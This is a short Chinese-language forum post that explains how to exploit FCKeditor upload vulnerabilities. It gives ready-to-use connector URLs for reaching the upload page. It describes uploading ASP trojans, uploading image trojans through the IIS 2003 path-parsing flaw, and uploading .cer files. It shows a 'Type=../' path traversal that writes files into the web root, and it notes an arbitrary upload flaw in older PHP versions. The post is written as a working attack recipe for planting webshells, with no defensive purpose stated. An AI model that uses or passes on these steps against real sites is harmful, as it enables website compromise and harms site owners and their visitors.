1 asp版上传漏洞<--Version 2.2 FCKeditor/_samples/default.html 或者 fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp就会看到编辑页面, 可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马,后者上传cer文件 如果是ASPX的就将/asp/connector.asp后缀改为ASPX Type=Image这个变量是我们自己定义的。比如: fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp 这时候我们就创建了一个名为user的目录,默认情况下没有任何文件格式上传限制 上传后我们的文件就保存在 /UserFiles/user下了 我们也可以这样 fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp 这样文件就可以直接传到网站的根目录了 2 Fckeditor <=2.4.2 For php 任意上传文件漏洞 未对Media类型进行上传文件类型的控制,导致用户上传任意文件 利用方式就不在这里重复了 |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 01:29 , Processed in 0.122839 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.